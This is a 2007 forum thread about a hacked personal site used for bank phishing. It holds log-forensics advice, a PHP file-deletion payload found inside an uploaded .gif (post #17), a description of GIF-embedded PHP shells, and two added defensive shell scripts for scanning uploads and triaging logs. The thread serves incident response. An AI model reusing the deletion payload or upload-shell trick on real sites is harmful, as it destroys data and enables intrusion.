My site got hacked, used for phishing, please help!

Discussion in 'Security' started by Riccardo, Nov 7, 2007.

  1. #1
    One day I got this from my host:

    My site is using a self-programmed admin panel (htaccess and user:password protected) for writing news, charts, lyrics, uploading pics, editing php files directly online....

    People visiting the website were also able to submit news and upload pictures, which then had to be activated by the admin in the admin panel.

    Could this be the issue that someone uploaded those files and directories?
     
    Riccardo, Nov 7, 2007 IP
  2. ndreamer

    #2
    is this a dedicated box? we can not really say what the problem was without looking at the code. what you need to do is check your file permission settings and scan your code for any holes. if you have any 3rd party software, make sure they are all up to date.

    make sure you check your site for any hidden iframes and remove them asap.
     
    ndreamer, Nov 7, 2007 IP
  3. Fash

    #3
    Go through your access logs and look for strange entries as well as bruteforce attempts (huge list of the same IP trying to access your admin panel over and over again).
     
    Fash, Nov 7, 2007 IP
  4. hans

    #4
    in such warnings based on already existing abuse you normally should have a deadline of a few hours only.

    it is apparent that you have lacking knowledge
    and also gave too little info to help more precisely
    URL !!?

    to get real help you need to give facts of all SW - most efficient is URL to site!

    then:

    1.
    ask politely your host for help
    especially date, time or details of the security breach of your site

    2.
    with that data
    you should then start a complete search of all your log files.
    i.e.
    apache error_logs
    access_logs
    /var/log/warn
    /var/log/messages >> search: grep "Invalid user" /var/log/messages
    you see a lot of lines similar to:
    Invalid user a from 62.123.192.212
    Invalid user fluffy from 147.46.69.170
    Invalid user admin from 147.46.69.170
    Invalid user test from 147.46.69.170

    these are hundreds or thousands of usual DAILY hacker attempts we all have on our machines
    make sure NONE of them was successful !!

    also go thru the
    mail logs !!

    visual search near and before date of incident.

    look / search for google referrers !!!
    from a months or several months back

    if you have limited knowledge then chances are you have been hosting cybercriminals many times

    look in ALL previous ( at least one year back ) access_logs for entries of files that do NOT belong to you

    look INTO ( open in editor !! ) all index.php files !!!
    look into access_logs for strings like

    - paypal
    - ebay
    etc ( all the typical phishing mails )

    hackers often leave either files behind OR at least during the actual USAGE of files you WILL have log entries !!!

    MEANWHILE until you found EXACT root-cause and SOLVED by securing, you seriously and instantly should:

    freeze all login SW
    either by disabling all SW, disable ALL upload of ANY and every kind of file !!

    chmod 000 all folders into admin sections and/or upload sections
    chmod 000 all interactive areas

    replace password login by server key login AND completely DISABLE sitewide all password login !!

    make a LIST - of all files,
    DOWNload all files for offline verification of FILE content

    hackers / phishers often use COMMON file names already existing in a normal site to change its content into hacker content - such as for example index.php, which often is the hacker's admin panel with all functionalities.

    by doing above you may lose traffic - but may be able to save the site
    by being too negligent you may lose your site and your host correctly shuts down all - including YOU. especially since the planet has a rather poor reputation of hosting hackers and questionable sites and activities.

    cybercrime is something as serious as robbing a bank
    hosting cybercrime even if done out of gross negligence is as serious as the hacker-activities itself.
    hence ACT now, until solved, forget weekend and sleep, get coffee and use GOOGLE,
    search for

    security alert ( and add ONE by ONE every single piece of your installed SW ) to see which SW you have, did have or does have known security bugs.

    scan your site using NESSUS !! - full scan.
    you get a huge output with lots of details.
    solve every security problem step by step.

    it may take you until near Christmas - it took me many hundred hrs when I was in your situation some 2 yrs ago.
     
    hans, Nov 7, 2007 IP
  5. Riccardo

    #5
    Ok, all third party software is up to date!

    Secondly my friend who is managing the server is quite good. I don't have ssh access and will ask them for the logs, but they are so huge, any command to just grep the logs for specific files or directories?

    I will try Nessus.

    I will also check for paypal and iframe stuff but i doubt there is something.

    Thanks for helping me a bit, I'm so frustrated!
     
    Riccardo, Nov 7, 2007 IP
  6. Riccardo

    #6
    Does Nessus also scan the php files? all files on my website?
     
    Riccardo, Nov 7, 2007 IP
  7. hans

    #7
    paypal is just one possibility of phishing site setup and since names or folders for a pp phishing site often do contain the word paypal - such log entries in OLD log files would be easy to find.
    other phishing site setups include most major banks such as citibank, ebay, amazon, etc anything that has online accounts and online login.

    if u understand the method of how hacker setup phishing site, then you also know how to search for ANY other phishing site or MASS-mailing setup on your site.

    keep in mind that your host HAD a complaint - complaints of that nature always are the result of existing EVIDENCE.
    hence you still HAVE a security hole in YOUR part of the site, NOT in the hosting/server part of the site.

    hosts/servers seldom or never are the risk factor
    the only risk ALWAYS is webmaster and his lack of knowledge to properly configure and secure HIS installed SW.

    for your info
    precise numbers from early in the year to yesterday
    i had exactly
    218937 brute force password crack attempts on my server ...
    that's a lot
    and you most likely have similar but never aware because out of YOUR control
    in addition to such sshd attacks there are a comparable number of OTHER attempts - for me AND for you.

    you may most safely assume that YOUR site is UN-secured until the very moment when YOU have actively secured your site in all aspects of SW usage beyond installing scripts.
    installing configuring scripts is the tiny part
    securing all is the real work of a webmaster
    latter part may take many hundreds of hrs study of all aspects of scripts installed by you on your server
    plus an equal period of time to actually search/find and secure all parts of your site.

    nessus is one possible powerful way to control and search for known security breaches

    searching ALL your log files - using tools and visually searching is the other method
    unless you have FOUND the entry point and understood the procedure used by hackers and have then fixed that hole - your site and your host are compromised and still at risk.

    hackers come in intervals
    a few days active
    then weeks or months passive to make you believe all is fine
    then another rush on your unsecured site ...
    year after year
    until you fixed all holes OR reduced the scope of www activities to a range that you fully understand and fully secure based on true existing knowledge
    i call that principle "always stay within your own limits" of what you know, understand and are able to fully control AND secure.

    NO need for any frustration
    this is a CHALLENGE to make you a better, more responsible and more secure webmaster!!!
     
    hans, Nov 7, 2007 IP
  8. Riccardo

    #8
    just a quick reply, it isn't paypal or such things, it's

    boveda.banamex.com.mx/serban/emp/ something, only this was found on server and reported by host

    also, I'm not good at php or Linux yet, I'll study this later. at the moment I'm a stupid model travelling the world and not having time at all.

    the logs are so huge, any command to grep only the lines we need, from a specific date or file?
     
    Riccardo, Nov 8, 2007 IP
  9. hans

    #9
    fine for you
    paypal may have become much too tough to crack now. as I mentioned below ... etc !

    hence NOW you know what to do hopefully

    having the files uploaded/reported

    1.
    assuming you are a professional and have Linux offline as well, you do

    2.
    cd to the directory where you have ALL your past access_log files, then
    in shell

    zgrep "boveda.banamex.com.mx" access_log-2007*.gz >> hacker.txt

    (use ANY and every string or path found by your host and reported to you by replacing above "boveda.banamex.com.mx" ! )

    FYI - I am sure you already checked WHO the damaged party is - banamex.com.mx is a mexican bank = BANCO NACIONAL DE MEXICO and the mexican bank account holders may be the damaged persons as a result of your cooperation to host hackers.

    hence a delay in YOUR securing your site may either bring Interpol to you or American law enforcement - depending on where you reside these hours and days.
    bank robbery is a crime in ALL countries of this planet - and what the hackers did is nothing short of a modern way to rob a bank = banamex.com.mx !

    this above zgrep line may need to be adapted to your precise file name for access_log files but may be correct as is in default apache configuration. this a.m. copy/paste bash line does a complete search of ALL your 2007 access log files and writes the output into the text file hacker.txt

    then you see in above hacker.txt file the FIRST dates and the IPs used - with ALL the IP's found you do again a

    zgrep "xxx.yyy.zzz.aaa" access_log-2007*.gz >> hacker_IP_xxx.yyy.zzz.aaa.txt

    replace xxx.yyy.zzz.aaa by a correct IP used by the hackers,
    repeat above IP search for EACH IP

    now after all that

    search for the FIRST IP occurrence
    date + time

    then go with a regular text editor into that uncompressed access_log file of that date
    and SEARCH visually line by line back and forth around those minutes and seconds of the first occurrence of the hackers IP

    what URL on YOUR site did they visit first
    what was the referrer in their first visit
    then you should know the SW with the security bug
    and study thru Google all security alerts or configuration errors that made it possible for hackers to enter your site.

    RE your: "at the moment im a stupid model traveling the world and not having time at all."

    YES indeed you may be stupid to throw away your life. having a web site and having NO time - means YOU don't care about the real and total damage hackers may do WITH your active support and help. gross negligence, omission to secure your site very definitely may be considered by ANY smart court of law as CO-operation with hackers and some hackers may be simple terrorists hence you may be eligible for a visit by any law enforcement agency or home land security - unless you travel very fast into deepest bush and wait for a few decades
    or unless you really have no time and prefer to spend a few years behind bars ...!!??!!!

    if YOU have a site - then YOU also have a legal liability and responsibility to keep your site free from abuse by hackers and terrorists!
    if you really have no time then it would be your legal responsibility to ask your host TO SHUT DOWN your entire site! until you find time to do what you are responsible to do - your civil duties and responsibilities as a site owner and caring citizen of this planet's human society!

    think twice if you HAVE time on your own
    or
    if you want law enforcement authorities to GIVE / make you time ... it's your life and your FREEDOM at stake as well in addition to the wellbeing of any number of possibly damaged mexican bank account holders
     
    hans, Nov 8, 2007 IP
  10. Riccardo

    #10
    Thanks mate. I did shut down the site until I solve this issue. Modelling I started because I had personal problems I might have been running away from, and to try to sort my life and thoughts while doing a bit more travelling. I don't see it as important.

    I know it's my task and reliability and that's why the website is down! I respect, understand and know what you are talking about. And yes, I already paid upfront 1 year uni in Sydney to study IT :)

    I'm not that stupid :)

    Thanks for all the info and will let you know as soon as I have results.

    You are very helpful I must say. Thanks
     
    Riccardo, Nov 8, 2007 IP
  11. hans

    #11
    good luck in your study and life

    God bless
     
    hans, Nov 8, 2007 IP
  12. toby

    #12
    i got a similar problem before. What happened was that the hacker knew my password to my box. so he just logged on as me and uploaded the phished site.

    so make sure you change all your passwords including your email account. REMEMBER to reformat your pc or scan for viruses.

    In my case, i think the guys knew my email account and hence knew everything from there. So now, I reformat the pc just in case.
     
    toby, Nov 8, 2007 IP
  13. sp360

    #13
    What some hackers do is they put a Shell (it's a PHP script that acts like an FTP manager, DB manager etc.) code in a .GIF file and then upload it to your server, and then they locate it and use those commands of theirs and they get root access. Maybe you should take that function out.
     
    sp360, Nov 8, 2007 IP
  14. hans

    #14
    you must be kidding, still using a password to access your box
    that was last millennium we did such - but these years we use serverkey controlled access and SSH !!

    how many password crack attempts did / do you have per year on your box ?? I had this year so far almost a quarter Million !! see my most recent blog article on site security

    sp360

    that upload thing - that's the karma of/for all those who want others to fill their box and create all the content that brings the traffic and adsense-$ .. !

    in my above security blog-article I have a full example of how hackers attempt to abuse sites who allow uploads - to upload hacker stuff like the shell you mentioned or virus infected files in almost any format.

    preventive measure is to always and only create all your content yourself and thus to have no upload permission for anyone else but you - and then via ssh/sk.

    better have a smaller site but safe/secure and fun, than to have an oversized and out of control site that rocks you into copyright infringement and hackers hell.

    look at all those giants like blogger, blogspot, myspace, hi5, spaces.live, and the many picture "sharing" sites and forums, many grow so huge that they most likely need an attorney on 24/7 just to keep out of lawsuits due to all the illegal stuff going on on their sites. all the a.m. directly named blog/social sites are copyright infringers by the thousands each year - multiplied by thousands of other damaged creators of stolen / illegally uploaded to OTHER servers material - a truly dynamic and up-to-date attorney could start a huge class action lawsuit in a federal court to once and forever stop such huge server abuse on inadequately controlled and poorly managed sites / servers. the damage done to owners of stolen material and damage created by hacked sites may go into a 2-3 digit Billion $/yr range easily.

    a reason more to stay clean and keen site and nights and off-hours so quiet and relaxing that you actually can enjoy life without having to fear some law enforcement knocking at your door for hosting hackers or cyber criminals ...
     
    hans, Nov 9, 2007 IP
  15. Riccardo

    #15
    Thanks guys for all the info, i hope my mate is sending me the logs soon. I removed the upload function already and will change all passwords! Thanks

    But wouldn't the htpasswd thing protect my admin panel anyway? or is that easy to crack?
     
    Riccardo, Nov 10, 2007 IP
  16. hans

    #16
    htpasswd has quite little to NOTHING to do with the way hackers crack your site
    if you look at some of the most recent security posts i have the last few days in my blog ( sig link ) then you find precise real life samples how hackers do things and none of these real life hack sceneries has anything to do with password at all but with script - securing and ( by hackers and the world ) KNOWN security vulnerabilities of popular scripts. most of these (bugs) are known but never the fixes applied because the site owners have far too little or NO understanding of all site/security relevant stuff.
    in most hacker cases such as yours and the last 10 or so i looked at during the past few days it always was a beginner-site, an easy MFA or so site where no considerable time has been invested to secure ALL scripts on system or on web space of a site.
    many are "just business" sites of ppl who just want to make money and have no time for such and believe that their host is doing their work for the 5-10 $ vhost fee / month ...

    site monitoring and securing PER months may easily take up to many DOZEN extra hours for a single site PER month.

    site securing starts with actually STUDY of installed scripts, what they do - how they do what they do, what additional members suddenly are allowed to do ...
    if MEMBERS can upload stuff, then most likely also hackers - just a matter of hacker's own creativity and experience.

    typical hackers are actually GOOD for you, because they invest as much time and efforts to hack your and other's site as site OWNER/operator SHOULD invest in running a site safely for all society.

    to operate securely / safely a site always is BEST done if you have instant and continuous 24/7/365 access to ALL logs LIVE - i.e. NOT the compressed ones after they are full, but the running ones,
    like all logs for
    - mysql
    - mail
    - warn
    - messages
    - apache errors
    - apache access
    etc
    for monitoring and finding the NEW stuff that was attempted by hackers in real time.
    old logs are for site forensic use only - like in your case.

    nessus will show you existing vulnerabilities as well as solutions to it by scanning all possible / existing scripts known to nessus for preventive security
    that again has nothing to do with the htpasswd stuff
    the htpasswd is just ONE out of ten thousands of possibilities to crack/hack a site.
     
    hans, Nov 11, 2007 IP
  17. Riccardo

    #17
    I think I found it, I found a .gif file that was uploaded and contained

    <?
    // Mis-encoded Cyrillic text (Windows-1251 bytes rendered as Latin-1)
    echo "Ïðåâåä, Ðèêêàðäåã!";

    // Walks two directories up from the uploaded "image" and deletes every file in ../../links
    $dh = opendir("../../links");
    while ($filename = readdir($dh))
    {
    echo $filename."<br>";
    unlink ("../../links/$filename");
    }
    ?>
    How can you prevent this from happening other than disabling the ability to upload gif files?

    The date was Jan 17th so I need to wait still till my mate sends me the logs. What would be the command to grep all log entries from that date?
     
    Riccardo, Nov 12, 2007 IP
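    For the question above and sp360's point in #13, an added example that is not from the thread: a scan of an upload directory that flags "images" carrying PHP, checking both the file signature and the body, because a file can start with a valid GIF header and still contain PHP further in. The directory, file names and sample files are constructed; the first sample mirrors the file found above.

```shell
#!/bin/sh
# Added example (not from the thread): flag uploaded "image" files that are really PHP.
# Two checks, because each alone is insufficient: the file must start with a raster image
# signature, AND its body must contain no PHP open tag (a polyglot passes the first check).
set -eu

UPLOADS="${TMPDIR:-/tmp}/uploads-scan.$$"
mkdir -p "$UPLOADS"
trap 'rm -rf "$UPLOADS"' EXIT

# Constructed samples (not real uploads):
#  photo1.gif  PHP with no image header at all, like the file found in the thread
#  photo2.gif  a genuine 1x1 GIF
#  photo3.gif  a real GIF header followed by PHP (polyglot)
#  photo4.gif  plain text renamed to .gif
printf '<?\necho "hi";\n$dh = opendir("../../links");\n?>\n' > "$UPLOADS/photo1.gif"
printf 'GIF89a\001\000\001\000\200\000\000\000\000\000\377\377\377!\371\004\001\000\000\000\000,\000\000\000\000\001\000\001\000\000\002\002D\001\000;' > "$UPLOADS/photo2.gif"
{ printf 'GIF89a\001\000\001\000'; printf '<?php echo "embedded"; ?>'; } > "$UPLOADS/photo3.gif"
printf 'just text\n' > "$UPLOADS/photo4.gif"

# First four bytes as lowercase hex, e.g. "47494638" for "GIF8"
magic_hex() { head -c 4 "$1" | od -An -tx1 | tr -d ' \n'; }

# Check 1: GIF ("GIF8"), PNG ("\x89PNG") or JPEG (SOI marker ff d8 ff) signature
has_image_magic() {
    case "$(magic_hex "$1")" in
        47494638|89504e47|ffd8ff*) return 0 ;;
        *) return 1 ;;
    esac
}

# Check 2: any PHP open tag in the body. -a scans binary files as text; the short tag
# "<?" on its own is included because the thread's file used exactly that.
has_php_tag() { grep -aqE '<\?(php|=|[[:space:]])|<\?$' "$1"; }

# Verdict for one file: php-in-image, no-image-header, or clean
classify() {
    if has_php_tag "$1"; then echo "php-in-image"
    elif ! has_image_magic "$1"; then echo "no-image-header"
    else echo "clean"; fi
}

# One "verdict<TAB>path" line per regular file in the directory
scan_uploads() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        printf '%s\t%s\n' "$(classify "$f")" "$f"
    done
}

scan_uploads "$UPLOADS"
```

    Anything not reported as clean should be quarantined and traced in the access logs; the upload directory itself should additionally be served with PHP execution disabled so a miss does not become code execution.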
  18. doctorjones

    #18
    always check your login time and login ip address. and always backup your files
     
    doctorjones, Nov 12, 2007 IP
  19. hans

    #19
    to prevent
    avoid ANY and every upload !!
    or
    prevent execution of PHP - that is only possible if you are in a perl or HTML folder of your site.
    check passwords of any users - ban / delete users with insecure passwords !! NO warning else they may re-sign up with a different name. use users/members with true names only and a few other general security measures.
    OTHERS here may have more help - i prefer strictly to stay within MY limits, hence on MY server ONE person only uploads - ME.

    to search when you got all your log files - search back in time - there might be OTHER hacker-visits by OTHER hackers as well long before that date or by same hackers but OTHER files.

    you may want to search the hackers IP back up to a year or more.

    a few steps you do - now it may be zgrep since old access_log files are all compressed. all else equal.

    1.
    zgrep "your_gif_file-name.gif" access_log-2007*.gz >> hacker_access.txt

    access_log-2007*.gz >>> that would be the exact apache2 format including date - in this search with wild card you search zgrep all log files starting first log file 2007 until last file. you also may go back to 2006. adapt precise file name to your precise log naming.

    that gives you as output written into the file hacker_access.txt all log lines that included the use of above found gif file.
    the oldest use is the most accurate to find the actual weak point in your system - the precise door or upload facility that causes your risk.

    of course by above zgrep you also find what IP or IPs hackers used when accessing that file.

    then you do another zgrep using the IP(s) related to the use of a.m. gif file - because hackers may have done much more than just use the file.

    do a

    zgrep "xxx.yyy.zzz.abc" access_log-2007-*.gz >>IP_list_hackers.txt

    replace xxx.yyy.zzz.abc by the actual IP
    if you have several IPs related to the use of above gif file, then repeat above procedure but write into a separate file for each IP to have a better overview.

    then write down exact times - start to end of each "visit"
    then search thru other log files

    apache error_log
    plus
    /var/log/warn
    /var/log/messages
    and others ( mysql, mail, etc )
    normally you have NO access to these additional logs - unless you are lucky like me and run a root server as your bride - bride because you spend your nights as much as your days with a root server !!!

    if NOW you have a friend on your hosting, you may get the a.m. additional logs if you explain why - and research exact seconds / minutes during visits to see what else they do/did.

    you may find surprises, hence better secure yourself in a chair with belt .... to avoid fainting or falling in coma.

    you may also ask your server-host to run a rootkit check to see if they are infected in their system as a result of your guests.

    you may find anything from more phishing sites, to chat bots, to mass mailing systems - most or all of these files may be deleted on your HDD but leave traces in your logs to be found with related IPs ...

    study this case exactly and in all aspects from all sides - it may become a most valuable real life learning scenario and it may result either in your decision to reduce the potential of your online activities to regain freedom to sleep and have leisure time - or to shut down entire sections of your site
    or to change your job
    or to become a security expert
    ...
    it may take you time - up to hundreds of hours for above, you will most likely do much just using your own senses, skipping through all the grep-found lines - but you have a unique situation to really learn and appreciate security for the future.
     
    hans, Nov 13, 2007 IP
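    The zgrep procedure hans lays out in #9 and #19, plus Riccardo's #17 question about pulling one day's lines, as an added example that is not from the thread: the same steps as shell functions, run against two constructed gzip-compressed Apache access logs so it can be tried offline. The log lines, file names and client IPs are constructed; only the host-reported path comes from the thread.

```shell
#!/bin/sh
# Added example (not from the thread): hans's zgrep log triage as shell functions, run
# against two constructed, gzip-compressed Apache access logs so it works offline.
set -eu

WORK="${TMPDIR:-/tmp}/phish-triage.$$"
LOGS="$WORK/logs"
mkdir -p "$LOGS"
trap 'rm -rf "$WORK"' EXIT

# Constructed combined-format log lines. The phishing path and the Jan 17 date mirror
# the thread; the client IPs are RFC 5737 documentation addresses, not real ones.
printf '%s\n' \
 '203.0.113.9 - - [05/Jan/2007:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"' \
 '198.51.100.7 - - [17/Jan/2007:03:12:44 +0000] "POST /upload.php HTTP/1.1" 200 210 "http://www.example.com/upload.php" "Mozilla/4.0"' \
 '198.51.100.7 - - [17/Jan/2007:03:13:01 +0000] "GET /pics/photo.gif HTTP/1.1" 200 16 "-" "Mozilla/4.0"' \
 | gzip -c > "$LOGS/access_log-2007-01.gz"
printf '%s\n' \
 '198.51.100.7 - - [02/Feb/2007:22:40:10 +0000] "GET /boveda.banamex.com.mx/serban/emp/index.php HTTP/1.1" 200 4096 "-" "Mozilla/4.0"' \
 '192.0.2.33 - - [03/Feb/2007:08:00:00 +0000] "GET /boveda.banamex.com.mx/serban/emp/login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"' \
 '203.0.113.9 - - [04/Feb/2007:11:11:11 +0000] "GET /news.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"' \
 | gzip -c > "$LOGS/access_log-2007-02.gz"

# All 2007 logs decompressed in file-name (= chronological) order: the same stream the
# thread's `zgrep PATTERN access_log-2007*.gz` searches, without relying on zgrep's flags.
all_logs() { gzip -dc "$LOGS"/access_log-2007*.gz; }

# Step 1 (#9): every request line containing the string the host reported -> hacker.txt
grep_indicator() {
    all_logs | grep -F -- "$1" > "$WORK/hacker.txt" || true
    cat "$WORK/hacker.txt"
}

# Step 2: the distinct client IPs on those lines (field 1 of the combined format)
ips_for_indicator() { grep_indicator "$1" | awk '{print $1}' | sort -u; }

# Step 3 (#19): everything one IP ever did, one file per IP; prints the line count.
# Exact field comparison, so 198.51.100.7 does not also match 198.51.100.70.
dump_ip() {
    all_logs | awk -v ip="$1" '$1 == ip' > "$WORK/hacker_IP_$1.txt"
    wc -l < "$WORK/hacker_IP_$1.txt" | tr -d ' '
}

# Step 4: when that IP first appeared; this is the spot to read the raw log around.
first_hit_time() {
    all_logs | awk -v ip="$1" '$1 == ip {print; exit}' | sed 's/^[^[]*\[\([^]]*\)\].*/\1/'
}

# Step 5: the request of that first visit usually names the script with the hole.
first_request() { all_logs | awk -v ip="$1" '$1 == ip {print; exit}' | cut -d'"' -f2; }

# Riccardo's #17 question: all lines logged on one day, e.g. "17/Jan/2007".
lines_on_date() { all_logs | grep -F -- "[$1:" || true; }

# Walk-through on the sample data, end to end
for ip in $(ips_for_indicator "boveda.banamex.com.mx"); do
    echo "$ip: $(dump_ip "$ip") line(s), first seen $(first_hit_time "$ip"): $(first_request "$ip")"
done
```

    On the sample data the earliest hit for the IP that later served the phishing directory is a POST to the upload script, which is the kind of first-visit clue hans says to read the raw log around.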
  20. lslars31

    #20
    Oh wow, I thought .htaccess was pretty solid. Unless you had a weak password or something, who knows. I suggest you check out http://thefirewallscript.com though. Seems like a pretty solid script.
     
    lslars31, May 23, 2008 IP